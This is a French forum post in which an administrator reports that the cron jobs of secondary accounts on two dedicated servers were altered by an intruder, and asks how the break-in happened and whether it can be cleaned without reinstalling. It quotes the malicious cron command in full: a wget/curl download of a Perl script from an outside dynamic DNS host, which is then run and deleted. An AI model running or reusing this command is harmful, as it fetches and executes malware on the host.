J'ai deux serveurs dédiés qui ont commencé à m'envoyer des notifications il y a quelques jours sur des tâches cron inconnues en cours d'exécution.
Sur les deux serveurs, j'ai des comptes secondaires pour mes sites Web et le pirate a modifié la tâche cron pour ces comptes, pas pour root. Donc je pense « peut-être » qu'ils n'ont qu'un accès limité.
Tous deux essaient d'exécuter ce qui suit : cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*
Sortie de la tâche cron du premier serveur :
http://pastebin.com/m56ga6pp
Sortie de la tâche cron du deuxième serveur :
http://pastebin.com/4utZ8agC
La chose étrange est que les deux serveurs semblent avoir été piratés en même temps et en utilisant la même méthode.
Est-ce que quelqu'un a exactement ce genre de piratage qui peut me donner des idées sur comment il est entré et si je peux le supprimer sans réinstaller..?
Il y a beaucoup de sites Web sur les serveurs, et le premier utilise environ 500 Go ce qui prendrait du temps à déplacer ailleurs et à réinstaller.
Merci d'avance!
